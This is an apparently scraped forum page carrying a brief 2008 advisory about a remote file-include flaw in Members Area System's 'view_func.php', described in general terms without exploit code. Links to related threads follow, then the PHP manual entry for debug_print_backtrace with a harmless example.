Login or Register to Ask a Question and Join Our Community


Security Advisories (RSS)

S-126: Members Area System 'view_func.php' Vulnerability

Login to Discuss or Reply to this Discussion in Our Community

 
Thread Tools Search this Thread
Special Forums Cybersecurity Security Advisories (RSS) S-126: Members Area System 'view_func.php' Vulnerability
# 1  
Old 01-22-2008
S-126: Members Area System 'view_func.php' Vulnerability
Members Area System is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. The risk is MEDIUM. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.


More...
Login or Register to Ask a Question

Previous Thread | Next Thread

4 More Discussions You Might Find Interesting

1. Cybersecurity

Web Hack Attempt from whois 209.126.68.6

Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs: $ cat error.log (36)File name too long: AH00036: access to... (4 Replies)
Discussion started by: Neo
4 Replies

2. Shell Programming and Scripting

SFTP return Error Code 126

Hi, We are getting the following error code while connection remote server using sftp command. sftp user@serrver Warning: child process (/opt/ssh2/bin/ssh2) exited with code 126. pls Advise. (2 Replies)
Discussion started by: koti_rama
2 Replies

3. UNIX for Advanced & Expert Users

Exit Status 126 - how to get rid of it

Hi All, I have a small application hosted on apache-tomcat 5. Basically its a html page which in turn calls a perl script residing on unix server. Through this perl script i am calling a shell script using system command , like system('scriptname.sh',arg1,arg2,arg3); Now in the script... (5 Replies)
Discussion started by: glamo_2312
5 Replies

4. AIX

ar: 0707-126

Trying to build code on IBM_AIX 5.3. Following error occured during build. ar: 0707-126 $projdir/obj/ibm/5.3/NewApp/NewApp.o is not valid with the current object file mode. Use the -X option to specify the desired object mode. ANy help is appreciated to resolve the error. (2 Replies)
Discussion started by: milindb
2 Replies
Login or Register to Ask a Question

LEARN ABOUT PHP

debug_print_backtrace

DEBUG_PRINT_BACKTRACE(3)						 1						  DEBUG_PRINT_BACKTRACE(3)

debug_print_backtrace - Prints a backtrace

SYNOPSIS

       void debug_print_backtrace ([int  $options], [int  $limit])

DESCRIPTION

       debug_print_backtrace(3) prints a PHP backtrace. It prints the function calls, included/required files and eval(3)ed stuff.

PARAMETERS

	      o $options
		- As of 5.3.6, this parameter is a bitmask for the following options:

	      debug_print_backtrace(3) options

	      +----------------------------+---------------------------------------------------+
	      |DEBUG_BACKTRACE_IGNORE_ARGS |						       |
	      | 			   |						       |
	      | 			   |  Whether  or  not	to  omit the "args" index, and |
	      | 			   | thus all the function/method arguments,  to  save |
	      | 			   | memory.					       |
	      | 			   |						       |
	      +----------------------------+---------------------------------------------------+
	      o $limit
		-  As of 5.4.0, this parameter can be used to limit the number of stack frames printed. By default ($limit= 0) it prints all stack
		frames.

RETURN VALUES

	No value is returned.

CHANGELOG

       +--------+-----------------------------------------+
       |Version |					  |
       |	|					  |
       |	|		Description		  |
       |	|					  |
       +--------+-----------------------------------------+
       | 5.4.0	|					  |
       |	|					  |
       |	|   Added the optional parameter $limit.  |
       |	|					  |
       | 5.3.6	|					  |
       |	|					  |
       |	|  Added the optional parameter $options. |
       |	|					  |
       +--------+-----------------------------------------+
EXAMPLES

       Example #1

	      debug_print_backtrace(3) example

	      <?php
	      // include.php file

	      function a() {
		  b();
	      }

	      function b() {
		  c();
	      }

	      function c(){
		  debug_print_backtrace();
	      }

	      a();

	      ?>

	      <?php
	      // test.php file
	      // this is the file you should run

	      include 'include.php';
	      ?>

	      The above example will output something similar to:

	      #0  c() called at [/tmp/include.php:10]
	      #1  b() called at [/tmp/include.php:6]
	      #2  a() called at [/tmp/include.php:17]
	      #3  include(/tmp/include.php) called at [/tmp/test.php:3]

SEE ALSO

       debug_backtrace(3).

PHP Documentation Group 												  DEBUG_PRINT_BACKTRACE(3)